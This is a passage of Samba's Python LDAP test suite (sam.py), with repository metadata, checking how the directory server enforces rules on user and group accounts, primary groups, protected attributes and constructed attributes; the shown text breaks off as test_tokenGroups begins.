| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5f7c90db2376246d8d6e00a7a2e2313b378713c8
| 98,794
|
py
|
Python
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/sam.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2019-01-13T09:19:10.000Z
|
2019-02-15T01:21:02.000Z
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/sam.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | null | null | null |
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/sam.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2020-03-08T01:58:25.000Z
|
2020-12-20T10:34:54.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This is a port of the original in testprogs/ejs/ldap.js
import optparse
import sys
import os
sys.path.insert(0, "bin/python")
import samba
samba.ensure_external_module("testtools", "testtools")
samba.ensure_external_module("subunit", "subunit/python")
import samba.getopt as options
from samba.auth import system_session
from ldb import SCOPE_BASE, LdbError
from ldb import ERR_NO_SUCH_OBJECT, ERR_ATTRIBUTE_OR_VALUE_EXISTS
from ldb import ERR_ENTRY_ALREADY_EXISTS, ERR_UNWILLING_TO_PERFORM
from ldb import ERR_OTHER, ERR_NO_SUCH_ATTRIBUTE
from ldb import ERR_OBJECT_CLASS_VIOLATION
from ldb import ERR_CONSTRAINT_VIOLATION
from ldb import ERR_UNDEFINED_ATTRIBUTE_TYPE
from ldb import Message, MessageElement, Dn
from ldb import FLAG_MOD_ADD, FLAG_MOD_REPLACE, FLAG_MOD_DELETE
from samba.samdb import SamDB
from samba.dsdb import (UF_NORMAL_ACCOUNT, UF_ACCOUNTDISABLE,
UF_WORKSTATION_TRUST_ACCOUNT, UF_SERVER_TRUST_ACCOUNT,
UF_PARTIAL_SECRETS_ACCOUNT, UF_TEMP_DUPLICATE_ACCOUNT,
UF_PASSWD_NOTREQD, ATYPE_NORMAL_ACCOUNT,
GTYPE_SECURITY_BUILTIN_LOCAL_GROUP, GTYPE_SECURITY_DOMAIN_LOCAL_GROUP,
GTYPE_SECURITY_GLOBAL_GROUP, GTYPE_SECURITY_UNIVERSAL_GROUP,
GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP, GTYPE_DISTRIBUTION_GLOBAL_GROUP,
GTYPE_DISTRIBUTION_UNIVERSAL_GROUP,
ATYPE_SECURITY_GLOBAL_GROUP, ATYPE_SECURITY_UNIVERSAL_GROUP,
ATYPE_SECURITY_LOCAL_GROUP, ATYPE_DISTRIBUTION_GLOBAL_GROUP,
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP, ATYPE_DISTRIBUTION_LOCAL_GROUP,
ATYPE_WORKSTATION_TRUST)
from samba.dcerpc.security import (DOMAIN_RID_USERS, DOMAIN_RID_DOMAIN_MEMBERS,
DOMAIN_RID_DCS, DOMAIN_RID_READONLY_DCS)
from subunit.run import SubunitTestRunner
import unittest
from samba.dcerpc import security
from samba.tests import delete_force
parser = optparse.OptionParser("sam.py [options] <host>")
sambaopts = options.SambaOptions(parser)
parser.add_option_group(sambaopts)
parser.add_option_group(options.VersionOptions(parser))
# use command line creds if available
credopts = options.CredentialsOptions(parser)
parser.add_option_group(credopts)
opts, args = parser.parse_args()
if len(args) < 1:
parser.print_usage()
sys.exit(1)
host = args[0]
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
class SamTests(unittest.TestCase):
def setUp(self):
super(SamTests, self).setUp()
self.ldb = ldb
self.base_dn = ldb.domain_dn()
print "baseDN: %s\n" % self.base_dn
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestuser2,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptest\,specialuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
def test_users_groups(self):
"""This tests the SAM users and groups behaviour"""
print "Testing users and groups behaviour\n"
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
ldb.add({
"dn": "cn=ldaptestgroup2,cn=users," + self.base_dn,
"objectclass": "group"})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["objectSID"])
self.assertTrue(len(res1) == 1)
group_rid_1 = security.dom_sid(ldb.schema_format_value("objectSID",
res1[0]["objectSID"][0])).split()[1]
res1 = ldb.search("cn=ldaptestgroup2,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["objectSID"])
self.assertTrue(len(res1) == 1)
group_rid_2 = security.dom_sid(ldb.schema_format_value("objectSID",
res1[0]["objectSID"][0])).split()[1]
# Try to create a user with an invalid account name
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"sAMAccountName": "administrator"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Try to create a user with an invalid account name
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"sAMAccountName": []})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Try to create a user with an invalid primary group
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"primaryGroupID": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Try to Create a user with a valid primary group
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"primaryGroupID": str(group_rid_1)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Test to see how we should behave when the user account doesn't
# exist
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("0", FLAG_MOD_REPLACE,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Test to see how we should behave when the account isn't a user
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("0", FLAG_MOD_REPLACE,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
# Test default primary groups on add operations
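# Default primary group by account type, as exercised below: normal user
# accounts get DOMAIN_RID_USERS, workstation trust accounts get
# DOMAIN_RID_DOMAIN_MEMBERS, server trust accounts get DOMAIN_RID_DCS, and
# partial-secrets (RODC) accounts get DOMAIN_RID_READONLY_DCS (with a
# fallback on pre-2008 DCs).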
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# unfortunately the INTERDOMAIN_TRUST_ACCOUNT case cannot be tested
# since such accounts aren't directly creatable (ACCESS_DENIED)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DOMAIN_MEMBERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_SERVER_TRUST_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DCS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Read-only DC accounts are only creatable with
# UF_WORKSTATION_TRUST_ACCOUNT set and work only on DCs >= 2008 (therefore
# we have a fallback in the assertion)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_PARTIAL_SECRETS_ACCOUNT | UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertTrue(res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_READONLY_DCS) or
res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_DOMAIN_MEMBERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Test default primary groups on modify operations
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
# unfortunately the INTERDOMAIN_TRUST_ACCOUNT case cannot be tested
# since such accounts aren't directly creatable (ACCESS_DENIED)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer"})
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DOMAIN_MEMBERS))
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_SERVER_TRUST_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DCS))
# Read-only DC accounts are only creatable with
# UF_WORKSTATION_TRUST_ACCOUNT set and work only on DCs >= 2008 (therefore
# we have a fallback in the assertion)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_PARTIAL_SECRETS_ACCOUNT | UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertTrue(res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_READONLY_DCS) or
res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_DOMAIN_MEMBERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Recreate account for further tests
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
# Try to set an invalid account name
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement("administrator", FLAG_MOD_REPLACE,
"sAMAccountName")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# But resetting the actual "sAMAccountName" should still be possible
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountName"])
self.assertTrue(len(res1) == 1)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement(res1[0]["sAMAccountName"][0], FLAG_MOD_REPLACE,
"sAMAccountName")
ldb.modify(m)
# And another (free) name should be possible as well
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement("xxx_ldaptestuser_xxx", FLAG_MOD_REPLACE,
"sAMAccountName")
ldb.modify(m)
# We should be able to reset our actual primary group
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(DOMAIN_RID_USERS), FLAG_MOD_REPLACE,
"primaryGroupID")
ldb.modify(m)
# Try to add invalid primary group
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("0", FLAG_MOD_REPLACE,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Try to make group 1 primary - should be denied since it is not yet
# secondary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_1),
FLAG_MOD_REPLACE, "primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Make group 1 secondary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_REPLACE, "member")
ldb.modify(m)
# Make group 1 primary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_1),
FLAG_MOD_REPLACE, "primaryGroupID")
ldb.modify(m)
# Try to delete group 1 - should be denied
try:
ldb.delete("cn=ldaptestgroup,cn=users," + self.base_dn)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Try to add group 1 also as secondary - should be denied
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Try to add invalid member to group 1 - should be denied
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement(
"cn=ldaptestuser3,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Make group 2 secondary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
ldb.modify(m)
# Swap the groups
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_2),
FLAG_MOD_REPLACE, "primaryGroupID")
ldb.modify(m)
# Swap the groups (does not really make sense but does the same)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_1),
FLAG_MOD_REPLACE, "primaryGroupID")
m["primaryGroupID"] = MessageElement(str(group_rid_2),
FLAG_MOD_REPLACE, "primaryGroupID")
ldb.modify(m)
# Old primary group should contain a "member" attribute for the user,
# the new one shouldn't contain it anymore
res1 = ldb.search("cn=ldaptestgroup, cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["member"])
self.assertTrue(len(res1) == 1)
self.assertTrue(len(res1[0]["member"]) == 1)
self.assertEquals(res1[0]["member"][0].lower(),
("cn=ldaptestuser,cn=users," + self.base_dn).lower())
res1 = ldb.search("cn=ldaptestgroup2, cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["member"])
self.assertTrue(len(res1) == 1)
self.assertFalse("member" in res1[0])
# Primary group member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_DELETE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Delete invalid group member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser1,cn=users," + self.base_dn,
FLAG_MOD_DELETE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Also this should be denied
try:
ldb.add({
"dn": "cn=ldaptestuser2,cn=users," + self.base_dn,
"objectclass": "user",
"primaryGroupID": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Recreate user accounts
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
ldb.add({
"dn": "cn=ldaptestuser2,cn=users," + self.base_dn,
"objectclass": "user"})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
ldb.modify(m)
# Already added
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Already added, but as <SID=...>
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["objectSid"])
self.assertTrue(len(res1) == 1)
sid_bin = res1[0]["objectSid"][0]
sid_str = ("<SID=" + ldb.schema_format_value("objectSid", sid_bin) + ">").upper()
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement(sid_str, FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Invalid member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser1,cn=users," + self.base_dn,
FLAG_MOD_REPLACE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Invalid member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement(["cn=ldaptestuser,cn=users," + self.base_dn,
"cn=ldaptestuser1,cn=users," + self.base_dn],
FLAG_MOD_REPLACE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Invalid member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_REPLACE, "member")
m["member"] = MessageElement("cn=ldaptestuser1,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement(["cn=ldaptestuser,cn=users," + self.base_dn,
"cn=ldaptestuser2,cn=users," + self.base_dn],
FLAG_MOD_REPLACE, "member")
ldb.modify(m)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestuser2,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
# Also run a small test for accounts with special DNs ("," in this case)
ldb.add({
"dn": "cn=ldaptest\,specialuser,cn=users," + self.base_dn,
"objectclass": "user"})
delete_force(self.ldb, "cn=ldaptest\,specialuser,cn=users," + self.base_dn)
def test_sam_attributes(self):
"""Test the behaviour of special attributes of SAM objects"""
print "Testing the behaviour of special attributes of SAM objects\n"""
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(str(GTYPE_SECURITY_GLOBAL_GROUP), FLAG_MOD_ADD,
"groupType")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
# Delete protection tests
for attr in ["nTSecurityDescriptor", "objectSid", "sAMAccountType",
"sAMAccountName", "groupType"]:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_REPLACE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_DELETE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("513", FLAG_MOD_ADD,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_ADD,
"userAccountControl")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["objectSid"] = MessageElement("xxxxxxxxxxxxxxxx", FLAG_MOD_ADD,
"objectSid")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountType"] = MessageElement("0", FLAG_MOD_ADD,
"sAMAccountType")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement("test", FLAG_MOD_ADD,
"sAMAccountName")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
# Delete protection tests
for attr in ["nTSecurityDescriptor", "objectSid", "sAMAccountType",
"sAMAccountName", "primaryGroupID", "userAccountControl",
"accountExpires", "badPasswordTime", "badPwdCount",
"codePage", "countryCode", "lastLogoff", "lastLogon",
"logonCount", "pwdLastSet"]:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_REPLACE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_DELETE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
def test_primary_group_token_constructed(self):
"""Test the primary group token behaviour (hidden-generated-readonly attribute on groups) and some other constructed attributes"""
print "Testing primary group token behaviour and other constructed attributes\n"
try:
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"primaryGroupToken": "100"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNDEFINED_ATTRIBUTE_TYPE)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
# Test one invalid and one valid operational attribute, but also the attributes they are built from
res1 = ldb.search(self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken", "canonicalName", "objectClass", "objectSid"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
self.assertTrue("canonicalName" in res1[0])
self.assertTrue("objectClass" in res1[0])
self.assertTrue("objectSid" in res1[0])
res1 = ldb.search(self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken", "canonicalName"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
self.assertFalse("objectSid" in res1[0])
self.assertFalse("objectClass" in res1[0])
self.assertTrue("canonicalName" in res1[0])
res1 = ldb.search("cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
res1 = ldb.search("cn=ldaptestuser, cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE)
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken", "objectSID"])
self.assertTrue(len(res1) == 1)
primary_group_token = int(res1[0]["primaryGroupToken"][0])
rid = security.dom_sid(ldb.schema_format_value("objectSID", res1[0]["objectSID"][0])).split()[1]
self.assertEquals(primary_group_token, rid)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["primaryGroupToken"] = "100"
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
def test_tokenGroups(self):
"""Test the tokenGroups behaviour (hidden-generated-readonly attribute on SAM objects)"""
print "Testing tokenGroups behaviour\n"
# The domain object shouldn't contain any "tokenGroups" entry
